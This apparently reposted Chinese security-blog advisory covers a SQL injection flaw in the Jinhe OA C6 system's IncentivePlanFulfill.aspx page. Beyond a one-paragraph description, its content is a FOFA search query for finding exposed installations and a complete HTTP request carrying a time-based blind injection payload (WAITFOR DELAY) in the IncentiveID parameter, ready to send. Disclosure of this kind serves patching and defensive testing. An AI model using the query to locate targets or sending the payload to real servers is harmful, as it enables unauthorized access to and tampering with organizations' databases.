金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞

admin 2024年3月28日23:55:58评论24 views字数 527阅读1分45秒阅读模式

 

漏洞描述

金和OA协同办公管理系统IncentivePlanFulfill.aspx存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。

资产测绘

FOFA:app="金和网络-金和OA"

漏洞复现

GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1WAITFOR+DELAY+%270:0:6%27--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Connection: close
Cookie: ASP.NET_SessionId=0uha1u0nhrn4meghddjiwu0y
Accept-Encoding: gzip

原文始发于微信公众号(漏洞文库):【漏洞复现】金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月28日23:55:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞https://cn-sec.com/archives/2591723.html

发表评论

匿名网友 填写信息